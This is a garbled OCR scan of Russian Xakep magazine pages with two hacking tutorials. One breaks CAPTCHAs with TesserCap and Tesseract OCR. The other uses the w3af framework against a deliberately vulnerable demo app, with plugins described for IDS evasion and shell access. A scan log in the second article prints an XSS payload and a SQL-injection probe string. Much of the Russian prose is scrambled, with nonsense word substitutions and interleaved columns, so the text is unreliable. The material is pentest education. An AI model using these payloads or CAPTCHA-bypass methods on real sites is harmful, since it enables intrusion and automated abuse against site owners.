поданный ниже, демонстрирует, по образу сие

pasteЬin.com

00-80%

URL-aдpec потребно глядеть на кого переадресации

происходит:

cavenue.com

>80%

к получения изображения, нужно выбрать эту опцию.

Ну да осталась последняя опция, вклю­

чающая/отключающая прибор предвари­ тельной обработки изображений, который мы рассмотрим далее. По умолчанию предварительная отделка изображений отключена. Пользователи на первых порах настраи­ вают фильтры предварительной обработ-

for(each pixel in

САРТСНА)

компоненты для того всех пикселей изображения.

{

Каждое числовое степь может обнимать

if (invertRed is true) new red=255 - current red if (invertBlue is true) new Ыuе=255 - current Ыuе if ( inve r tGree n is true) new green=255 - current green

компонентов каждого пикселя во зависимости от значения во фон выполняются следующие

действия:

0.

САРТСНА-изображениям да дальше активируют загружаемые затем включения опции ЕпаЫе

lmage

Pгepгocessiпg, проходят предвари­

Если вес в одинаковой степени

-1, заслуженный

цветовой составляющая отнюдь не меняе т ся.

ки изображений согласие тестируемым этот узел . Все СА РТ СНА-изображения,

057

lот -1 впредь до 0551 возможных значений. Для RGВ­

0.

Если спица в колеснице никак не непропорционально

-1,

постоянно найденные

компоненты указанного цвета !красный, зе­

Инверсия одного иначе говоря нескольких цветов

леный иначе синий] меняю т ся на соответствии

нередко открывает новые внутренние резервы про про­

веркитестируемого САРТСНА-изображения.

со введенным во полина значением. Значение О удаляет компонент, сила

тельную обработку равно уж кроме передаются в ОСR-систему Tesseгact для того извлечения

Этап

0. Изменение

цвета

текста.

На данном шаге дозволено модифицировать цветовые

055 устанав­

ливает его максимальную мощность

да т. д.

Этап

0. Градация

серого !Шкала яркости)

На третьем буква п е всё-таки изображения конверти ­ руются во изображения на градациях серого . Это Chop"""' O Activ.ste

01 <· 0 t~

одинарный обязывающий буква п п реобразо ­ вания изображений, ко т орый н ельзя про­ пустить. В зависимости через выбранной кнопки выполняется одно изо следующих действий, связанных вместе с цветовой составляющей каждого пикселя:

Aveгage -71Red + Gгееп + Bluel/3 . 2. Humaп -7 00.21 • Red + 0.71 • Gгееп + 0.07 • Bluel . 3. Aveгage of minimum апd maximum соlог componeпts -?IMiпimum IRed + Gгееп + Blue) + Maximum IRed + Gгееп + Blue ll /2 . 4. Miпimum -7 Miпimum IRed + Gгeen + Bluel. 5. Maximum -7 Maximum IRed + Gгееп + Bluel.

0.

В зависимости ото интенсивности равным образом рас­

пределения цветовой составляющей САРТСНА любой с сих филыров может улучшить @ Smooth Mack 0

0

Q S~M~2

Q S~~M~2

Sh.vpen Ммk 0

0

извлекаемое образ чтобы дальнейшей

Sharpen Ммk З

Q S~M~S

0

обработки . Этап

0.

Сглаживание равным образом нелицеприятность

Чтобы осложнить выжатие текста И з мен е ни е в области м ех подле изменении различны х д да апазонов цветового з начения 14 для сел ей во сторону белого или — или черного

изо САРТСНА-изображе н ий, на них д обавляют

Х АКЕР

03 /158/2012


П рове р ка в п ро чн ос ть

гул на форме однопиксельных иначе говоря многопик­

выдается опечатка равно личина неграмотный около меняе т ся.

Этап

сельных точек, посторонних линий да пре­

П ри выборе фиксированной маски кнопку

Это т фу льт р строит г рафик з а висимости з н аче­

етранетвенных искажений . При сглаживании

Save Mask

пускать в дело никак не требуется.

0. Вводим

Этап

фильтры

Н а этом этапе обработки изображения е г об

Passes

Cutoff.

В числовом поляна

пристало указать, как долго разок нужно

ния уров н автор этих строк некультурно г в отношении по отношению т частоты

(cutoff) встречаемос т равно

работы по части т секаю щ его фуй льт ра п оказа н ни а

устранения которого впоследствии используются

иначе говоря

Настройка отсечения

равно предлагае т выбрат ь отделение . П ри нц равно п

изображения возрастает беспорядочный шум, к

Bucket

0.

оттенки серого

во п сеяние д очес д е :

пиксели могут состоять окрашены на объёмистый

извлечь пользу с~ответствующую маску изобра­

широта оттенков серого. Этот фильтр ото­

жения пизда переходом получи и распишись ниженазванный этап.

бражает раздача градаций серого

Давай рассмотрим компоненты фильтра с целью

во

сглаживания равным образом повышения резкости. Доступ­

пикселей, окрашенных во оттенки серого

ны двойка подобно масок изображения:

во диапазоне через О поперед

00 баке т ахти [Ьuсkеt)/диапазонах. П ро ц ен т 12,

указан во ба кете О,

if (pi xe l 's gr ays cal e value <=Cutoff ) pixel graysca l e val ue=( е OR 055) - > на зави со им насчёт сти, об т т насчёт го наравне а мы опция выбра н а (<=и ли=> : Set Every Pi xel with valu e <=/=> Th r eshold t o е. Rema i ning t o 055 )

Фиксированные маски. По умолчанию

выигрыш пикселей, окрашенных во касательно тт енки

TesseгCap имеет полдюжины самый популяр­

темновато г в рассуждении во диапазоне с

ных масок изображения. Эти маски могут

стушевывать образ тож распространять

изо следующих действий пользу кого каждого диа­

ние пикселей САР Т С Н А до цвета м равно п омо г ае т

дерзкость [преобразование Лапласа). Из­

пазона значений, соо т ветствующих оттенкам

снести п омехи со через отсе ч ения з н а ч е­

менения отображаются моментально а впоследствии вы­

серого:

ний уро вн мы серого .

бора маски от через соответствующих

0. Остави т ь кроме измене н ия [Leave As ls). 2. Заменить белым [White). 3. Заменить черным [Biack).

Этап

кнопок.

Пользовательские маски изображения.

03

перед

05,-

на ба кете

т. д. Пользователь может наметить одно

0: Обтесывание (choppiпg)

После применения из глаживаю щ е г о, отсекаю­

ще г о,

Юзертакже может настроить пользова­ тельские маски обработки изображений,

График показывает п в отношении д роб н ое рас пр е д е л е ­

Бла г одаря сим оп ц иям позволяется контроли­

bucket-

да д ругих фу л ьтро на САР Т С Н А ­

изображе н ия всё е щ е могут обыденщина ь следовать ш у м ле н ы

вводя значения во числовые полина да нажи­

ровать разные диапазоны оттенков се­

однопиксельными или — или бессчётно п иксе л ьными

мая кнопку

рого, а в свою очередь сокращать/удалять шум, меняя

точками, посторонними линиями равным образом п реетран ­

оттенки серого во сторону белого либо — либо черного.

етвенными искажениями . П рин ц равным образом п рабо т ы

Save Mask . Если

число коэф­

фициентов на сих окошках в меньшей степени нуля,

' J •' '. /

МИНЗДРАВСОЦРАЗВИТИЯ РОССИИ ПРЕДУПРЕЖДАЕТ:

КУРЕНИЕ ВРЕДИТ ВАШЕМУ ЗДОРОВЬЮ


PCZONE РАСПОЗНАЕМ КАПЧИ

фильтра обтесывания зак л ючается во следую­

меняет его вес уровня серого новым,

щем: ежели цифра смежных пикселей,

что показано подальше на псевдокоде. Инверсия

окрашенных на отваленный привкус серого, мен ь ше

серого проводится для того подгонки изображе­

этой утилиты, да в настоящий момент отлично было бы про­

величины на числовом поле, фильтр обтесы на а­

ния подо ц на етовые настройки ОСR-системы.

проводить собеседование какую-нибудь капчу сверху прочность.

ния п чалтык во аивает им з н аче н ие О [ ч ерный ! либо — либо

055 [белый! п по части на ыбору п в отношении л ьзователя. П ри э т ом САР Т С Н А анализируется что во горизонталь­ ном, круглым счетом да во вертикал ь ном направлении.

Ну который ж, пожалуй, пишущий сии строки рассмотрели весь опции

Предлагаю в целях примера одолжить болона говорят xakep.гu.

for(eac h pi xel i n САРТ С НА ) new grayscale value=255 - current graysc al e value

Итак, запускаем утилиту равно шагом марш нате сайт журнала . Видим ведомость свежих новостей, за­ ходим на первую попавшуюся да пролистываем

перед места, идеже позволительно покинуть частный коммента­ Этап

0: Изменение

ширины параметры .

Этап

00: Проверка

распознавания капчи

рий. Ага, коммент круглым счетом просто-напросто безвыгодный прикинуть [еще бы, а ведь бы сыздавна ранее всё эаспамилиl- нужно

Как у тв ерж д ает виновник ути л равным образом т ы, на ходе

Цель данного этапа - отдать предвари­

п ерво н ачаль н ых да сс л е д ова н ий равным образом разра­

тель н по части обработанное САРТС Н А-изображение

подсоединять капчу. Н у ась? ж, проверим, не грех

ботки TesseгCap симпатия стократно отмечал,

ОСR-системе к распознавания. Кнопка

ли сие автоматизировать . Копируем

что, при случае САРТСНА-изображения имеют

Solve

беретка вид в дальнейшем фильтра

URL

картинки равным образом вставляем его на адресную строку

толстую граничную линию да ее флора отлича ­

инверсии серого, отправляет во ОСR-систему

TesseгCap . Указываем, ась? нужно найти применение

ется ото основного фона САРТСНА, иные

для того извлечения текста да отображает воз­

капч, да нажимаем Staгt . Программа безотказно

вращенный подтекстовка на графическом интер­

загрузила

Д анный фильтр п редназ н ачен для того обрабо т ки

системы

фейсе. Если узнанный слова совпадает

познать. К сожалению, весь капчи оказались

OCR

малограмотный могут рас п ознать текст.

02

02

картинок равно попыталась их рас­

граничных линий равным образом их изменения. Граничные

вместе с текстом для капче, значит, наша сестра безошибочно

либо безвыгодный распознаны, об нежели свидетельствует

контуры из шириной, которая указана во число­

задали фильтр с целью предварительной об­

посвящение

вом поле, окрашиваются во сизо-черный либо мел

работки. Теперь допускается переброситься сверху вкладку

неправильно. В общем, неудивительно, приближенно

по мнению выбору пользователя.

опций равным образом зачислить опцию предварительной

во вкусе посторонние шумы да искажения малограмотный были

обработки [ЕnаЫе

удалены. Этим ты да я в тот же миг равным образом займемся . Жмем

Этап

0: Инверсия

серого оттенка

Это т гадость л ьтр п роходит каж ды й пиксель да увлекаться

lmage Pгepгocessiпgl с целью

-Failed-

перед ними, либо распознаны

обработки всех последующих загруженных

правой кнопкой мыши нате одну с

капч.

женных картинок равно отправляем ее во систему

02

загру­

МИНЗДРАВСОЦРАЗВИ1ИЯ РОССИИ ПР~ДУ


Пр оверка в пр по части чн волос

nредварительной обработки

[Send То lmage

Ргергосеssог]. Внимательно рассмотрев совершенно

ЗАКЛЮЧЕНИЕ

В конечном итоге, как бы автор этих строк ни бился, в ажуре

САРТСНА - изображения являются одним

признать нарост говорят у меня в такой мере равно далеко не получилось .

изо самых эффективных механизмов в области защите

ры, посему почесали получай вкладку опций равным образом указы ­

Пришло сь работать от pasteЬin.

веб -приложе ний с автоматизированного за­

ваем, который разнюхивать нужно всего только цифры

com,

[Сhагасtег

02

капч, видим , что-нибудь они содержат только лишь циф­

Это, в качестве кого видишь, совер шенно неверно.

которые минус проблем посчастливилось рас­

полнения форм. Однако слабые капчи смо г ут

Set; Numeгics]. Теп ерь можно п е реходить сверху вкладку lmage Pгepгocessing

познать. Но разве твоя милость окажешься уси дчивее

защити ть с случайных роботов равно малограмотный устоят

равно терпеливее равным образом сумеешь надергать кор­

прежде целенаправленными попытками их

к настройки фильтров. Сразу скажу, аюшки?

ректное различение капч из xakep.гu, ведь

решить. Как да криптографические алгоритмы,

п что до игравшись из первыми тремя фильтрами

приёмом заходи бери вкладку опций равно включай

САРТСНА-изображения, тщательно проте­

[ << Инверсия цвета>>, <<Изме нение цвета >>,

пре дв арительную обработку изображений

стированные да обес п ечи на ающие вас сокий уро­

<< Градация бездарно г что касается » ] моя персона отнюдь не увидел никакого по­

[ЕnаЫе

lmage Pгepгocessing]. Затем пере ходи

вень безопасности, являются самым лучшим

ложительного эффекта, потому-то оставил в дальнейшем

получай

и, кликнув получи и распишись Staгt, загружай свежую

способом защиты. На основе статистики,

всё согласно дефолту. Я выбрал маску

порцию капч, которые об эту пору будут пред­

которую привел творец программы, аз многогрешный выбрал

варительно приготовляться твоим филь­

пользу кого своих п роектов гeCaptcha да буд у реко­

Smooth Mask

установил численность насчет ходов равным

Main

тром. П осле того, что график отработает,

мендова ть ее во всех отношениях своим друзьям- возлюбленная ока ­

залась самой стойкой изо протес т ированных.

которых меньше, нужно назначить на О, а те,

послать ко всем чертям корректно/некорректно распознан­ ные капчи [кнопки Магk as Соггесt/Магk as l nCoггect] . С сего момента не грех просма­

которых больше, во

тривать сво дн ую статистику согласно распознава­

полуавтоматизированное уступка САРТС Н А.

нию вместе с через

Через специфический

одному. Фильтр Gгayscale

buckets

автор пропустил

равным образом перешел разом для настройке отсечения . Вы­ б рал важность

054

да указал, сколько те пиксел и,

055.

Чтобы отделаться

что до т оставшихся точек, включил

chopping

равно из­

Show Statistics . В

общем-то ,

В любом случае безграмотный от тоит забы вать , почто во Сети есть нема ло сервисов, которые предлагают

API

твоя милость передаешь серви­

сие индивидуальный подотчет относительно защищенности праздник

су лик , а оный посредством непродолжитель ­

фильтр переключать невыгодный было смысла, вследствие чего пишущий эти строки

alias отличный САРТСНА. Если овчинка выделки стоит дилемма по отношению вы­

ное пора вот звра щает резолюция . Решает ка пч у

со разу нажал нате

боре того или — или др угого решения, в таком случае вместе с помо­

настоящий индивидуальность [например, изо Китая ] , п о­

щью TesseгCap основательно позволительно проложить свое

лучая следовать сие свою копеечку. Ту т сделано паршивый

собственное тестирование.

защиты блистает своим отсутствием : ]. ::::к:

менил ширин у параметры давно

00. Последний

Solve.

На капче у меня было число н в отношении содержание распознала его

014945, как 011435.

Содержание на дыме сигареты: смолы - 0; 0 мг, никотина- 0,4; 0, 0 мг, С О- 0; 0 мг

0Р~ЖДА~Т: КУР~НИ~ ВР~ДИТ ВАШ~МУ ЗДОРОВЬЮ


PCZONE

Тара со Иващен ко

loxdeflaoxdef.info] ·

~-

v

ФРЕИМВОРК

[!]·

для того веб-пентестера

·~

Ин форм ац да я пред ст авп е н а и вместе с кл юч равно т ел ьно для насчёт з н ак в рассуждении м ления .

Редакция безграмотный нес е т отв е тственности

ТЕСТИРУЕМ БЕЗОПАСНОСТЬ ВЕБ-ПРИЛОЖЕНИЯ С ПОМОЩЬЮ WЗAF

следовать е е использование в прот равным образом кайфовый з а ко в отношении н ны х

целя х. nодобные

дескать йствия вл ек у т з а из об й уголовно е преследование .

Прое ко т wЗaf от равно льно выделяется сред равно мног их други х инструм е нтов к ис не без; ледования

безопасности веб-приложени й. Это

безвыгодный обычны й скэнар вместе с круто забитым функционалом , а фреймвор к, позволяющи й

равным образом спользовать паче сотни различных плагинов для исследования сайта, поиска уязвимасте й и их последующей эксплуатации . ЧТО ТАКОЕ WЗAF? Совреме н ные веб-приложе н да мы поуже чуть-чуть нежели похожи н а своих п ред­ ш естве н нико на , ко т крик ы е бы л равно во путь у е щ е п мы т ь л ет н аза д . Они стано ­ вятся всё больше популярными, ис п ользуют куда как свыше техно­ логий, сколько увеличивает допустимый градиент атаки, обрабатывают всё больше разной информации, в томик числе финансовые равным образом переанальные данные . Чтобы прибавить риски, автор можем насадить процес от безоnас­ ной разработки п рограммна го обеспечения, важным эт апом которого является дерево т иро на ание безопас н ости. Услов н что касается говоря , не возбраняется выде­ лить четное число ыре на ида тестиро во ания безопасности веб - приложения :

0. Автоматизированноесканированиенауязвимос т и. 2. Ручноетестированиебезопасностиlпентестин~ . 3. Статическийанализкода. 4. Аудит кода.

-

n

Сегодня ваш покорный слуга хочу рассказа т ь насчёт проекте wЗaf lwЗaf. oгg l . Это фреймворк !Web Applicatioп Attack and Audit F гamewoгkl , кто может бытовать исполь зова н для для тестирования бе зо пасности на еб-приложения

первых двух видов тестирования. Автором сего открытого проекта является Андреас Рианчо с Аргентины. Сейчас редакция разрабаты­ вается nреимущественно им равным образом незначительный гру nn ой контрибьюторов

со безвыездно г что до мира, во ко т орую въезд ит да ав т вопль сих строк

,._ ~.ы. jNII'amtWI axllt

ним опять же принимают активное причастность такие известные компании,

·-·""""""'

. ..... ..,"",_ Plugin

..

N:Jt.ie

-.

:1. В работе в д

Thll ptugln 0nr:ts СIОМ 0118 SCI\ping (XSS) 'o'lllntl'.ьllllin.

в духе

TolndXSS~twpluglnwllstl'lda . . ofi81161C:11pttmoJD8\II!Yp61."....., andsнrctlforfllllnpulln . hlltlpCIIIИ. Тhepaiiiii'IМtr "~c:onev.nsltoepkqniOIIOAIIIO.Ifi~IOhwetlfC)pliedon 81'1d81h.,..;l, requnt .. P'Qt$4!CI'in~bflolqu:twrцnOtiOICII«ЬOttlminllhoWI'I\CII'I)'

~НinQS .,I иntlarmylr1к'ion~

~

Rapid7

да Я ндекс! Фреймворк написан получи и распишись

Python,

который, равно как твоя милость

знаешь, является << языком из батарейками>>. Батарейки wЗ af- зто его расширения, которы х набралось уж сильнее сотни. Это, конечно, еще не

Mozilla

Fiгefox, только еще шабаш мощное оружие .

A" tfl'lliiRtOOtl r.1 <,« '*"IFilt

Q

.Z II.Я.

,_,

~ l!miFill

tМckSIONd

0:3

011111'A:18f01CМC~~s l 0

касательно

0 Oi

КАК УСТРОЕН WЗAF? Фреймворк wЗaf состоит с двух важных частей: ядра равно плагинов.

Главное окошко wЗaf

Ядро запускает перворазрядный nроцесс да координир ует работу плагинов ,

ХАКЕР

03/158/2012


Фреймворк про пенте не без; т паяц

,·- ·- ·- ·- ·- ·- ·- ·- ·- ·- ·- ·- ·- ·- ·- ·- ·- - ·- ·- ·- ·- -, - · - · - · - · - · - · - · - · - · - · - ·,

: (Discivery)

для во еб -nрил оже нию равным образом его ответах . Если относительно nять пров есть ти аналогию

.

от вместе

(вrutforce) ~ : •

0

UNI X, сие положительно эквива л ен ттекс т ово го nотокового sed, н в отношении ужедля НТТР-транз акций. Заме жилка вот всех от­

редактора

ветах hidd en -n oля получай обы чны етекстовые? П ожалуйс т а! Еvаsiоn -nлагины исnользуются в целях обхо д а nростых nравил раз­

0.

личных 005. Хо чеш ь nодальше сохраняться незамече нным nр равно nр о­ ведении очередного nентеста веб -nр иложения? То гда исnользуй

что-нибудь с сего набора.

0.

Оutрut-nлагины выn ол няют простую миссию: формируют на удо бо­ читаемом виде об т четы насчёт результатах работы wЗaf. Вы бирай, что тебе чище nодходит-<<nравославныЙ >> текстовый выкройка т тож

И нфо рмаци что до нный nоток на wЗaf

<<э нтерn райз н ый>>

POF,-

либо — либо nо-быстрому наnиши побольше nод­

покоящий для того твоих нужд nлагин . а что-то около а обме н инфо рмации в обществе ними. Плаг ины, на вместе с во ою очередь,

0.

Аuth-nлагины берут для себя целый nроцесс уnравления nоль­

находятуязвимости да п озволяют пр оэкс пл уа тировать их. Ч ерез основа

зо на ательской сессией: авторизируются во веб-nриложении,

плагины обмениваются информацией, для прим еру, в рассуждении найденн ых запро­

nроверяют, чтоб конференция оставалась сматывайся дн ой, равно выnолняют во

сах про фаззинга. В ко аче от тве ц ентрального хранилища информации

конце сканирования точный размер выработки изо веб-nриложения. Это

выст у паеттак называемая «б аза з наний >>.

относительно ч е нь ванька-встанька обно. Ещ ё со на сем н е давн об далеко не б ыл об удоб н ой потенциал

Слово «фрейм ворк >> на названии разработки у п отребляется отнюдь не слу ­ чайно . WЗaf пр е д оста вля ет платформ у, во в таком случае времена как бы вполне функцио­

просматривать nользовательские части веб-приложений, так сделал ть те, зачем в хо дятся вслед за авторизацией. Да , дозволено было обозначить wЗaf

наличность с целью пентеста реализован на разных плагина х. Для каждого нового

исnользовать nредварит ельно nолученную да з браузера куку, н об

ск анир ова ния твоя милость можешь разбирать токмо нужные тебе аддоны,

сие н е самый удовлетворительно обный сnособ. Сейчас на составе wЗaf итого единовластно

комбинируя их. Плагин каж дого типа, котор ы х во общей сложности на­

аuth -n лагин, а возлюбленный nодойдёт про большинства случае в. Д а равным образом отнюдь не

счи тываетс пишущий эти строки восемь, отвечает вслед устройство по отношению пр е деленной ради дач равным образом .

забывай, аюшки? автор имеем д ело от фреймворком, равным образом дозволяется наnисать

0. Плагины пользу кого поиска во вал можны хточек на хо правда во пр иложение !или та для

экой nлагин nрактически пользу кого первый встречный конституция ауте нт ификации:

называемые disсоvегу-плагиныl собирают телосложение , ссылки да не насчет частностей

SMS, токены

равным образом т.n . У тебя во руках весь мощь Python!

всё, что-нибудь можетсгенерироватьзапрос ко во еб- пр иложению. Та ким об­ ра зо м формируется листок запросовтестируемого приложения . Хо ­ рошим прим ерам та ко го плагина является античный веб-паук ,

Теnерь, когда-никогда пишущий сии строки далеко не несть разобрались из архитектурой wЗaf, настало

скаются во странность е, вследствие ч ему цели , обнаруженные получай пр е дыду­

момент у смотреть его на д ействии. Сnециа льн по отношению про д емо н не без; трации ваш покорнейший слуга на­

щем этапе, п об падают получи и распишись во хо д сих а плаг ино на нате следующем э тап е.

nисал nростое, да оче нь <<вебдва нольное >> nриложение социальной

Этотnроцесс nродолжаетеядатех п по отношению р, n ока невыгодный достаточно д ос тигн ут

наnравленнос т равно nод названием ltte г. Да , сие сер на ис для того ведения

лимит, определяемый пользу кого режима nои ска цел ей про фаззинга.

0. Аудит-nлагины исnользуютвывод nлаг инов !то снедать т иллюминаторы входа в nриложениеl для того n оиска у ваш покорный слуга з на да мастей, котишка орые nозволяютосу­ щест витьтакие атаки, какХSS, SQL-инъекция, IR)LFI да пропасть

микроблогов, да , мы по-над еюс ь , некто ста н е ттаким а nоnулярным, в качестве кого его

глупый

040 символами в одно депеша стар ши й светильник т. :1

Те стовое веб-nриложение обладает следую щ ими свойс тв ами:

основано получи

LAMP ILinux-Apache-M yS QL-PHPI;

имеетфункцию n оиска равно услуга nрив атных сообщений;

др у ги х.

З.

СКАНИРУЕМ ВЕБ-ПРИЛОЖЕНИЕ

реализованный на виде модуля webSpideг. Оisсоvег у -плагины ради пу­

Gгер-nлагины nросты, однако на как и сезон очен ь nолезны, в качестве кого да изо во ест­

nолноценный достуn для функционалу nриложения nредоставляется

ная UNI Х-ут илита , во почтение которой они получай з ваны . Смысл та кой: после

исключительно заре гистрир ованным равно авторизова нны м nользователям;

gг ер -nлагин nро хо диткаждая ровня НТТР -зап р ос/от вет, на которой nроизводится nоиск интересующей получи и распишись из информации !номера

средство н оис nоль зуетАJАХ;

кре дитны х карт, вн утренни е IР -ад р еса, а др еса элек тронн ой nочты

равно т. n.l. Эти nлагины равным образом умеют сыскивать учас тки nотенциально

имеет, лукавый nобери, уязвимости!

ХОЛОДНЫЙ ЗАПУСК

onacнoгoJavaScгipt-кoдa, наnример :

Для вводные положения ну-ка nросканир уем наше веб-nриложение безо авториза­

document.write document.location eval

тр и, только сие n ока небольш ой ахинея nр из) равным образом н терфейса:

ции- nросто натравим получи и распишись него сканер. В wЗa f поглощать двоечка ! во ообще, сейчас

gtkUi - графический, основанный сверху тулките GTK; consoleUi - хакерекий Ul интересах консольных старожи вылавливание !конечно же, вместе с удобным автомобиль после вершением искажение нд) .

0.

П од об ны е участки заключение многократно создают nредnосылки чтобы р еа­

Будем исnользова ть nервый изо них. Для заnуска GUI-версии на­

ли после ции атак вида ООМ based XSS l www. owasp . oгg/ i ndex.php/

бираем на консо ли <<./wЗaf_gui>> да видим в некоторой степени nо хожее держи изображен­

DOM Based XSS).

ное сверху ск р иншоте

Вгu tеfо гсе- nлагины , в качестве кого дозволительно возбуждать ся, nроизводят nеребор

nр офиль, цель, nлагины равно тулбар. Немн ого расскажу по части nрофилях.

значений к ме х анизмов аутентификации НТТР

0. Гл авное

расстояние крата д елено возьми до некоторой степени секций:

Basic да на обыч­

утнапиштим стать в целях лаги получи и распишись . Наnример , nлагин foгmlogin автоматически L.

детектир уетформ ы во хо правда объединение сод е ржани ю на ни х двух nараметро в, о дин изо которых им еетти n passwoгd. По сле об извне ния тако й

конституция вмиг начинается б р ут.

0.

Аttасk-nлагины nредназначены невыгодный в целях nоиска брешей, а пользу кого их

экс пл уата ции. Они, как бы равно др угие аддоны, используютобщую базу знаний по части те ст ируемом nриложении, во ча не без; тности , они используют ин­ формацию что до найденныхуязвимастях да пытаются их пр оэкс nл уати ­ ровать . Да-д а, особенно сии nлагины могутnомочьдобыть задушевный

••

.......

..

-

..... .. ...._.

ш е лл бери бажном сервере. ;l

0.

Маnglе-nлаг равным образом ны nозв оляютнал ету обменивать что-нибудь на вслед nро сах

ХАКЕР

03/158/2012

Структу р а на еб-nриложения

01,9


PCZONE

.

:::--CniМSiRSaiplngwMЬniC~JI'CГ. UJinO НПP 01181adGE1. f l'leS811diiiiW8S:

"limt=15&\PCSCIFТ~Н")<ISC<Pf .... ть. ml)(thcl'*-wuv Tnisdnt!abllotyateasAU.Ьrowsen.. Тtis.,._~...asloundO'INNCf,IИIWiflid!905.

. ... C/OIIIillla!IID/III~ • • c-•.er~p~orq...._.ы~o~r

.. .. ""&""'"".-- - - Результаты сканирования wЗaf

Использование прокси-утилиты во wЗaf

Как дозволительно догадаться, эт по отношению именованные наборы настроек, которые

Suite,

дозволительно нагружать на wЗaf. П касательно сути, сие in i-файлы, на которых твоя милость можешь

«nо льзовательские прокси>> позволяют на реальном времени относительно т слежи­

беречь nолюбившуюся тебе конфигурацию wЗaf, на волюм числе те­

вать [и инда изменять! НТТР-трафик в обществе веб-браузером равным образом веб­

стируемый

сервером. Конечно, сходящийся аппарат принимать равным образом на комплекте wЗaf.

URL,

выбранные равно настроенные плагины, саге-настройки

равным образом многое другое. Например, на сканирования ltteг аз многогрешный создал беспритязательный

другими словами даже если популярного аддона для Fiг efox - Таmрег

Data.

Такие

Вернее, такихпроксив нем аж две:

вид лещадь названием М у Pгofile, дальше подключил во нем disсоvегу­

disсоvегу-плагин spideгMan;

плагины webSpideг равным образом

диалоговый снаряд lnteгcepting Ргоху интересах ручноготестиро­

gгер-плагинов с целью

вания.

XSS-

pykto [порт знаменитого Nikto возьми Pythonl, пару поиска DOM XSS равно мало-мальски плагинов для того поиска

да SQL-инъекций. Ч тобы похерачить сканирование, нажимаем Staгt

равно ждем до некоторой степени минут, временно невыгодный появятся первые результаты. Кста­ ти, пишущий сии строки денно и нощно можем приглядывать из-за действиями wЗaf возьми вкладке

Log,

Для наших целей будем пускать в ход spideгMan, который, как бы да мы со тобой

сделано разобрались, представляет на вывеску disсоvегу-плагин. П опробуем

камо во реальном времени выводятся информационные сведения

его на деле. П одключаем плагин на главном окне да запускаем сканиро­

ото ядра равно п лагинов. Ход процесса отображается после прогреес - диско-бар

вание. В веб-браузере во качестве пр окси прописываем

равно отдельные люди идентификаторы.

[я использую для того сего адд симпатия F охуРгоху к F iгe f ox, в области зво ля ющий

П ример н что до помощью

минут сканнирование завершается. Посмотрим,

00

027.0.0.1:44444

легко и просто распоряжаться проксями да перекидываться меж ду ними! . SpideгMan

сколько посчастливилось отыскать wЗaf. П омимо ошибок конфигурации Апача равным образом кучи

короче запущен по webSpideг, круглым счетом что-нибудь окончательный сможет эксплуатнуть

подозрений нате

его результаты . Переключившись сверху spideгMan на нашем браузере, н е­

DOM XSS, скэнар обнаружил ряд XSSI Одна из них, на /i ndex.php, представляет интересах нас специальный интерес, осталь­ ные я все еще отложим. Плагин Pykto, на свою очередь, обнаружил доступную страни цу статуса Apache да phpinfo-cкpиnт /test.php. Другие плагины установили заголовок да версию использ уемого веб-сервера

да веб-фреймворка. В нашем случае сие

Linux

Apache/2.2.16 нате DeЬian GNU/

да язычок программировани РНР. Др угая полезная фишка, которая

позволяет нам отличается как небо через земли раскумекать структуру веб-приложения,- сие вклад­

ка

URLs из древовидной

картой веб-приложения равно ее графическим

представлением. Здесь а допускается пропускать однако НТТР-транзакции, сгенер ированные на рамках сканирования.

ПЕНТЕСТИНГ ВЕБ

0.0

Сейчас ранее ни живой души малограмотный удивишь играми, г рафическим редактором или видеозвонками после веб-браузер. Неотъемлем ой частью интернета стали веб-приложения, на которых логика выполнения запро граммирована нате стороне клиента из активным использовани­

ем JavaScгipt,

AJAX, JSON, HTML5

равным образом др угих названий равно аббревиатур.

:1 Такой сильный объединение технологий всё крепче затрудняет автоматизированное отлаживание безопасности веб-приложений. Прошли былые времена. Это анналы уж отнюдь не в рассуждении тестировании

заурядно г насчёт веб-сайта из множеством страниц вида /aгticle.php?id=68, на ко т орых, во из вою по части ч е р е дь , очищать куча ссылок , форм равным образом тому п одобного <<мяса>> чтобы веб-паука. На жа во , что обычно, <Ctгi -U >,

чтоб п обглядеть НТМL-к насчёт д , твоя милость увидишь грязь невылазная с огромного куска JavaScгipt равно маленечко тра д иционно г по части

HTML. П одобный

целый ряд полазаем объединение тестируемому веб-приложению. В L оg-табе видим:

[Mon 00 Мау 0011 02:08:22 АМ MST] spiderMan proxy i s running on 027.0.0.1:44444. Please configure your browser to use these proxy settings and navigate the target sit e. То exit spiderMan plugin please navigate to http:l/127.7.7.7/spiderMan?terminate . [Mon 00 Мау 0011 02 :15 :29 АМ MST] The user is navigating through the spiderMan proxy. [Mon 00 Мау 0011 02:15 : 09 АМ М5Т] Trapped fuzzaЫe requests: [Mon 00 Мау 0011 02:15:29 АМ MST] http ://localhost /i ndex.php 1 Method : GET [Mon 00 Мау 0011 02:15:32 АМ MST] http://localhost/user-info. php 0 Method: GET [Mon 00 Мау 0011 02 : 02:36 АМ MST] SQL injection in а MySQL database was found at: "http://localhost/user-info.php" , using НТТР method GET. The sent data was: "id=d'z"0". Th is vulnerability was found in the request with id 0911. [Mon 00 Мау 0011 02 :27:10 АМ MST] Cross Site Scripting was found at: "http://localhost/index .php", using НТТР method GET . The sent data was: "limit=15&u=<ScRIPT> a=/UzmE/%0Aalert(a.source)</SCRiPT>" . The modified paramete r was "u" . This vulnerability affect s ALL browsers. This vu lne rabi lity was found in the request wit h id 0042.

«сайт» что до ч ен ь

нередко малограмотный соответственно зубам веб -п ауку, построенному в соответствии с классической модели.

Как видимое дело изо лога, дабы остановить работу spideгMan, необхо­

Это весь аспидски интересное наклонность интересах развития средств

димо перешагнуть сверху особливый адрес, по прошествии что webSpideг да кое-кто

тестирования без движение сности веб-приложений. Ведь непонятно, что

плагины примутся вслед за дело. Так , аудит-п лагины обнаружили

во этакий ситуации автоматизированно пройти полный сайт - встраи­

равно ХSS-инъекциюl П ервая дыра, оказавшаяся в духе однажды на АJАХ-запросе,

вать полноценные

была упущена закачаешься времена первого сканирования.

JS

да рендеринг-движки? Использовать подход,

Добавлю одну каплю относительно эксплуатацию найденных ба го на . WЗaf умеет

сходственный Selenium/Web Dг iveг? Дл автор тестирования п од обных приложений далеко не быть без специализирован ны х прокси, т аких вроде

050

SQL-

OWASP WebScaгab

да В uгр

высасывать кровь некоторые люди ожидание уязвимастей и, для примеру, может предоставить тебе заветн ы й шел л получи целевой машине. Для эксплуа-

ХАКЕР

03 /158/ 0012


Фреймворк д ля п ентестера

..

тацииобнаруженнойуязвимостинадопростоперетащитьсоотве~ ствующий эксплоит нате вкладке

Exploit

получай уязвимость. Д ля эксплуа­

тации SQL-инъекций используется беспременно знающий тебе

.

---........

